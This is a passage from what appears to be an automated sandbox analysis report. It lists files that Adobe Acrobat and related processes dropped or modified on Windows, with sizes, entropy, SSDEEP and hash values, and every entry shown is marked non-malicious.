SHA-256: | BA3317C466FE10FC5D6B22F3B8823157B21BE10F20D12911C56D57657CA10848 |
SHA-512: | F5AA35844DDABDD2E5497B9796B6B1AA3A2C196AA52C309F366DBC2E51254A9B03C6A0B5EC2CFD4B48C8803D9725DF8C1D22C507AD8D31A13AD8C092E5F8BAD7 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07684830299345699 |
Encrypted: | false |
SSDEEP: | 3:DiklyYedozoCCjn13a/VUz1ollcVO/lnlZMxZNQl:t8zdvx53qV9Oewk |
MD5: | C080EC93CBE7736FE4A18162C6B7848E |
SHA1: | 1DA1FF33113645625BA96D0B88B81048429E09A6 |
SHA-256: | B182168AE9B2E6A4577428B68C5CB6FA83AB9AEBD481010D56B1004D7AB60280 |
SHA-512: | 8650575C716B71A0EC0F8D4927DF73C7E03A9B180FBE80DCB47BCF43AF2F7253A79F66DD53F7F966B1F1793BCDFF81E928BC8EB88BF74C728C49FA2D70A13745 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.174259535331831 |
Encrypted: | false |
SSDEEP: | 6:iOlqA9yq2Pwkn2nKuAl9OmbnIFUtHZG1ZmwpZQRkwOwkn2nKuAl9OmbjLJ:7R9yvYfHAahFUt5g/HQR5JfHAaSJ |
MD5: | 62256B8B6EA5FE52D1C7388A04CF0092 |
SHA1: | B0F2834DC4FD80C11F4B859FC135F4E90DD4C427 |
SHA-256: | BB35FA11FB42848B4803CE648C0DC1BE4AF5F3F16E44A3861417C8D9F78576F8 |
SHA-512: | 9FD21B0A82AEF24278F47F29DE893A851FCF09607B8A730EB8955A3B86EFC9B3BFC8F50A7BA7F76330A9A620D3E5DF167098E4CB0870923BC500D5CC6048B6CE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.174259535331831 |
Encrypted: | false |
SSDEEP: | 6:iOlqA9yq2Pwkn2nKuAl9OmbnIFUtHZG1ZmwpZQRkwOwkn2nKuAl9OmbjLJ:7R9yvYfHAahFUt5g/HQR5JfHAaSJ |
MD5: | 62256B8B6EA5FE52D1C7388A04CF0092 |
SHA1: | B0F2834DC4FD80C11F4B859FC135F4E90DD4C427 |
SHA-256: | BB35FA11FB42848B4803CE648C0DC1BE4AF5F3F16E44A3861417C8D9F78576F8 |
SHA-512: | 9FD21B0A82AEF24278F47F29DE893A851FCF09607B8A730EB8955A3B86EFC9B3BFC8F50A7BA7F76330A9A620D3E5DF167098E4CB0870923BC500D5CC6048B6CE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.128549563505652 |
Encrypted: | false |
SSDEEP: | 6:iOlgFGTX9+q2Pwkn2nKuAl9Ombzo2jMGIFUtHgSJZmwpgS9VkwOwkn2nKuAl9OmT:79X4vYfHAa8uFUtxJ/LD5JfHAa8RJ |
MD5: | 19FC27B14E20676A26BA1257051B7107 |
SHA1: | 6A4CAE31EF0E2450849152123E545D267CDE9C24 |
SHA-256: | 2F62774FB25D36A1B54C6470E970AADA4AD930121B5A281836B24AA2C5108174 |
SHA-512: | 711C231DAF8BDD1F388C5F8C758403DCF91735368357F9B08A37F1BDEC4EE243720CFC6B48F3C13A2F4FB0BE1AB77B3F9FAA99B3B1FB3A7788A0B133434A12CD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.128549563505652 |
Encrypted: | false |
SSDEEP: | 6:iOlgFGTX9+q2Pwkn2nKuAl9Ombzo2jMGIFUtHgSJZmwpgS9VkwOwkn2nKuAl9OmT:79X4vYfHAa8uFUtxJ/LD5JfHAa8RJ |
MD5: | 19FC27B14E20676A26BA1257051B7107 |
SHA1: | 6A4CAE31EF0E2450849152123E545D267CDE9C24 |
SHA-256: | 2F62774FB25D36A1B54C6470E970AADA4AD930121B5A281836B24AA2C5108174 |
SHA-512: | 711C231DAF8BDD1F388C5F8C758403DCF91735368357F9B08A37F1BDEC4EE243720CFC6B48F3C13A2F4FB0BE1AB77B3F9FAA99B3B1FB3A7788A0B133434A12CD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.972436193729398 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqVuEsBdOg2Hpcaq3QYiubInP7E4T3y:Y2sRdsiSdMHQ3QYhbG7nby |
MD5: | FBED5AF04BE5B343A349B331F365D22E |
SHA1: | 7FC9C27CF1613C77FDFC8AE8D27BFD6736034194 |
SHA-256: | 28B21B310ED280BADAE3E7F16A0999F76EECE07109E1C899FD0E52DAAFEE4BD1 |
SHA-512: | B59A04C28FAFC4894832AD7FFC68907CD6A61FDC34D3002A9C5220789278C148BEFAF1CB7E1A595909BD911F998C79F946181C90640C34CD736971C65AC25589 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\cc2919dc-3974-4932-9efd-52ca1712f379.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.972436193729398 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqVuEsBdOg2Hpcaq3QYiubInP7E4T3y:Y2sRdsiSdMHQ3QYhbG7nby |
MD5: | FBED5AF04BE5B343A349B331F365D22E |
SHA1: | 7FC9C27CF1613C77FDFC8AE8D27BFD6736034194 |
SHA-256: | 28B21B310ED280BADAE3E7F16A0999F76EECE07109E1C899FD0E52DAAFEE4BD1 |
SHA-512: | B59A04C28FAFC4894832AD7FFC68907CD6A61FDC34D3002A9C5220789278C148BEFAF1CB7E1A595909BD911F998C79F946181C90640C34CD736971C65AC25589 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4320 |
Entropy (8bit): | 5.253846549764298 |
Encrypted: | false |
SSDEEP: | 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7Q/oa:etJCV4FiN/jTN/2r8Mta02fEhgO73go+ |
MD5: | FD36917556C4084B395226D608764728 |
SHA1: | 94CD11DF3256AAAE5D47F77D684C7163FDC23B7F |
SHA-256: | 625ED76E0A3B4ED33B61310A1752E3CDD0C8E47383AD3D3E8FBEF15C8D6ABCF9 |
SHA-512: | 64EA2C6A49FC00298796F9DC156F9507E577F0D66707E642865516AFE61AEC66D1DF3217D5A5C63FA4C64125D77DCEFD9C1FCC65210D0906908277F102E8B6A6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.189927533441071 |
Encrypted: | false |
SSDEEP: | 6:iOlgUFm9+q2Pwkn2nKuAl9OmbzNMxIFUtHgUi0NJZmwpgUY39VkwOwkn2nKuAl9c:7pm4vYfHAa8jFUtjJ/6D5JfHAa84J |
MD5: | 575179FF59D401CEEDAB844DA4E8313B |
SHA1: | 247F7830D2F224341FC8A6CAA20A4C3AABC28E13 |
SHA-256: | 25975164CD1ECAA3E1F5273D5DA98B1ADD6D70C053E62224E252BAE32A8F98C0 |
SHA-512: | 8195AB2DD38533EBD47EF138A0554394C40649BF1C46274DD8A5BD862872C2541861DD49B44F6109E937F7CF3935F98AE0C9606DFB8612F2B1392062D2363D04 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.189927533441071 |
Encrypted: | false |
SSDEEP: | 6:iOlgUFm9+q2Pwkn2nKuAl9OmbzNMxIFUtHgUi0NJZmwpgUY39VkwOwkn2nKuAl9c:7pm4vYfHAa8jFUtjJ/6D5JfHAa84J |
MD5: | 575179FF59D401CEEDAB844DA4E8313B |
SHA1: | 247F7830D2F224341FC8A6CAA20A4C3AABC28E13 |
SHA-256: | 25975164CD1ECAA3E1F5273D5DA98B1ADD6D70C053E62224E252BAE32A8F98C0 |
SHA-512: | 8195AB2DD38533EBD47EF138A0554394C40649BF1C46274DD8A5BD862872C2541861DD49B44F6109E937F7CF3935F98AE0C9606DFB8612F2B1392062D2363D04 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444858483594685 |
Encrypted: | false |
SSDEEP: | 384:SeKci5t4iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:Wfs3OazzU89UTTgUL |
MD5: | 6D4F926881875FBC3CACEB3F1C1EC77B |
SHA1: | 13F5128F9732F050B3CBBE14F66F3CA99E16B25A |
SHA-256: | 8AB0B476F5AA66CD2B94998986B09B149AC53B3AF0C40652AFDE125F6FED5692 |
SHA-512: | 9C01420A91DDBF66867F8361413C4067EC72CBD1D0281D15ED03DE722F6CF7C71C1C3C5DD4396930E7F53E5972A8C7FF332DA64ED3814088496E0820DE36BD0C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2127058052267325 |
Encrypted: | false |
SSDEEP: | 24:7+tyxnuwKfvqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9M:7MQnCHqvmFTIF3XmHjBoGGR+jMz+Lha |
MD5: | 931B014F0ACCA9A1C208D7B6ED37C678 |
SHA1: | 6F5773ED0867E1B28E34D7732A0BC9B6233AEE4B |
SHA-256: | 6958EE9DDB092064B8AE8C207D6021FB9A26C6F04EBF03DB2BE4E304E5060207 |
SHA-512: | AC15C452002A1F9C7CDF055BECEBD88F27BC9AA7889C519C1792548605A1DD4947641DD95B6C64DB78AE927D240A1A21F8FD781A616DED4BE3EE72772CE0F46D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.775162490582081 |
Encrypted: | false |
SSDEEP: | 3:kkFklIOFW/ltfllXlE/HT8k5eXNNX8RolJuRdxLlGB9lQRYwpDdt:kKRGWteT8wmNMa8RdWBwRd |
MD5: | 7AFD55B1AA87F3F11D91350EB7EF4248 |
SHA1: | E522C37C929736E0484582963E235218990EF187 |
SHA-256: | 2FED24E227B0F027883BCA70978A021AE0E47DC7DC81301405A92ED2EE92AB39 |
SHA-512: | 053993E6D1EE37BA82A9860D87380CBF96B9CCB393BF1869593E69D7973242DA9D67B7CC1F0037F3DF8AAC0884786037E6F233D49520BCE14F37FB543736FDFE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.1391791584200512 |
Encrypted: | false |
SSDEEP: | 6:kKhyL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:QiDnLNkPlE99SNxAhUe/3 |
MD5: | FD1555736C01091A23BD412B8427CA29 |
SHA1: | 5470595E9ADE0D03435D9582A3D30BC741A91471 |
SHA-256: | 438115C3694C7993A056ABC8246C325653172D820C07D83D2434E348F0FCEE30 |
SHA-512: | 6BD70754308F3AE424F5C56599C58E9159FFB5B537BC455BA20AC64461D364C6135037E9A79A6F4C387D5C83C026FA880882F212C3A76C63F49793C1356FF934 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.365268463584628 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXzAgpdVoZcg1vRcR0YynqoAvJM3g98kUwPeUkwRe9:YvXKXkckZc0v5GMbLUkee9 |
MD5: | F6AF1005272BDFC9D85B7F617631DAB5 |
SHA1: | 22C28DA8F470A327FA9F64E2AD255331544F6649 |
SHA-256: | BB96A3D68A5D673287ADDD6A5298DCF40E606E3D73E41122676F6679BB0150BB |
SHA-512: | C8EEB570FC482B13A6E5BB536DAC46CEFE4E19FA2F599AD1B477683C4CB06C22571F151E88CEB27DC3CA0C229BD72E8D0515FC7227A7179F887071CB214D6B0A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.316112802540275 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXzAgpdVoZcg1vRcR0YynqoAvJfBoTfXpnrPeUkwRe9:YvXKXkckZc0v5GWTfXcUkee9 |
MD5: | 13D663E1BECDAF90B272BB6E24FD6F1B |
SHA1: | 3B8379444FB21C136BF3BEBC37F6B12CEFADB07E |
SHA-256: | 4F32B075F3C6654DB1F6EFEC87F3AC304D3ADDC0D6629377F3B56DCF002B01D7 |
SHA-512: | 05071CC5F3AEF56AF81B3B1E64EE5FCD3132FD520D969F46C8E784B6DC7D0732DE54F695C798643D46990B1117CF3F5011B4368EF8CA0D2A78CAC04EC8DA07DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.294819016767153 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXzAgpdVoZcg1vRcR0YynqoAvJfBD2G6UpnrPeUkwRe9:YvXKXkckZc0v5GR22cUkee9 |
MD5: | 74A6CF98EE6A47F244BE4CFEC87A2531 |
SHA1: | C265CF530EC80FCECC880C3E7BA88F5069971AA6 |
SHA-256: | 2EA989B16338A7BD9665478AA701D5DBB1584FA2405A1EBEED4A3869AC405360 |
SHA-512: | AB996267192EC6909C6299CFFF5D8FF8F651C6E9E4929ED6C858CB011300EC4EBA8B723635C039F89D7209EA5071E68AA99110D77C0BE866684F663E0FA7F4A2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.3523458145961875 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXzAgpdVoZcg1vRcR0YynqoAvJfPmwrPeUkwRe9:YvXKXkckZc0v5GH56Ukee9 |
MD5: | 9D60871FB8215567AE0A16C8C86E1C61 |
SHA1: | 45CDE66503D640D07F1C8EF0A58DEF850E8171DF |
SHA-256: | E4D34887BEC0AE266BF5DF4A7E1EA7B90CD0EFCF167842BE414176D1E6F6569C |
SHA-512: | 49C0D318A4E271BB64B7D43FF8C7752C8F5321622EFEE92E349E25D7D4B3D90FA7E4DEB7F740A23D9711F76979F8640485621647A6F4B7B1C281C199F0A24EFF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.690854010932823 |
Encrypted: | false |
SSDEEP: | 24:Yv6XlkzvepLgE9cQx8LennAvzBvkn0RCmK8czOCCSOr:Yvws2hgy6SAFv5Ah8cv/i |
MD5: | 8435B40BF6C60C3DEDBB41A003695177 |
SHA1: | D513EA8C9D77E7D510C3C42811661E8A7A53B65B |
SHA-256: | 9EECE3E0270E4A6674C3CCFDB50D99C38C24F503C9C5DFF043131828C7A6AEBC |
SHA-512: | 0BB13AFB1F79E6B6EF7251C078A3C1440A6048F5CD55A4EEEE90C5EE3E8231BE1078BBA71857A4EB1ACF005C8CC3FCDF46E026E28670B1D3A6B032F27E614E10 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.301348367905264 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXzAgpdVoZcg1vRcR0YynqoAvJf8dPeUkwRe9:YvXKXkckZc0v5GU8Ukee9 |
MD5: | 3B3BB5BF25DBCDC7D83F7EB4E8AA492B |
SHA1: | 80E70204D101C50B000CC499CEED410F1F199641 |
SHA-256: | 2A52DA3FBAB958FE9861B1171E3BF5839FEDCDA5A26CF0565F674407D2FF8B69 |
SHA-512: | 582D1B42FA8DBE257889FD25762A60B8A3DE88CB99596E55DFF9697F469F55A6393C62DD90BA5FE1D536770931C0E97596F5520435864F61E2F6EFE3CE810439 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.30609137595407 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXzAgpdVoZcg1vRcR0YynqoAvJfQ1rPeUkwRe9:YvXKXkckZc0v5GY16Ukee9 |
MD5: | 0F01521440CF29C152D0099CF5EC45D9 |
SHA1: | 4DDECE8B5DD47569839FDA244EEBB92E39E5A4F5 |
SHA-256: | AA8C711B69E2DAE60F16DB916DA44C8B4F4150E8535D3CDFEDB8ED1B21D7BA8E |
SHA-512: | 5A5706E5860AF3603F149524FED3649F66FD628924DBB87806A1BB940660F553831A0DEEF64E59C94FABA2EC4E8B9A2E65EF576D6060281F4C94CC910FEFF0AB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.312417926398003 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXzAgpdVoZcg1vRcR0YynqoAvJfFldPeUkwRe9:YvXKXkckZc0v5Gz8Ukee9 |
MD5: | 59BA8FE6552CD7F10BEDE96E8C00EFE4 |
SHA1: | 1A1186E114C5C7E0DA8B79D832191F6F5DAADF6F |
SHA-256: | 0CA339CD9A036D4BC1B51F619586B0B7FE891EFF46DDC5A7FC1F6ECF8A13912E |
SHA-512: | 5CAF33D7AC4316E6C2522102883E87E4A65A80478454C03461FFBB463C9C05CF95DEA28F96E1CCEF015F5C542F49A6236EC5FCBD82000C1EB391CB38F1FD8846 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.326108712700606 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXzAgpdVoZcg1vRcR0YynqoAvJfzdPeUkwRe9:YvXKXkckZc0v5Gb8Ukee9 |
MD5: | E52362DB6CEE1A6C3881D2F23A1EF1BF |
SHA1: | 06896F62CBBF3B77C1ABD8737FFD31A4BA961540 |
SHA-256: | A1AE0046BD4A3CE56A1BB9806AEA1ED3C16D5FE84185922DBD61477F18C2E624 |
SHA-512: | 97197FBF735FFB8BB6A3E7CEB2A087EFB6A4BE08469E68AEA411829D1AEC5CFBBD3A4E891455BEFBF3CCA5913E0C5C7DDDA3B2DFC80F833655D5F39AE33B2851 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.307432829067044 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXzAgpdVoZcg1vRcR0YynqoAvJfYdPeUkwRe9:YvXKXkckZc0v5Gg8Ukee9 |
MD5: | 9A07B45C6E4851C78F596D56C1B8D499 |
SHA1: | 8C78C51014A35077EA9B03C1EEF57DCC19F9A760 |
SHA-256: | 6829626DC4BD2E96B0716DB09FB3008081BB5396732C2707FA04650DD2D698AA |
SHA-512: | D5054C581454FA7F73C2C01F3AA18C0A84E12B215CD210F98CCAEEA086C160750FF7D7FF1C6792C7089863DCD7D0A9B4529978596B6AA64416C6ED5A1FAE9CB1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.293614061556592 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXzAgpdVoZcg1vRcR0YynqoAvJf+dPeUkwRe9:YvXKXkckZc0v5G28Ukee9 |
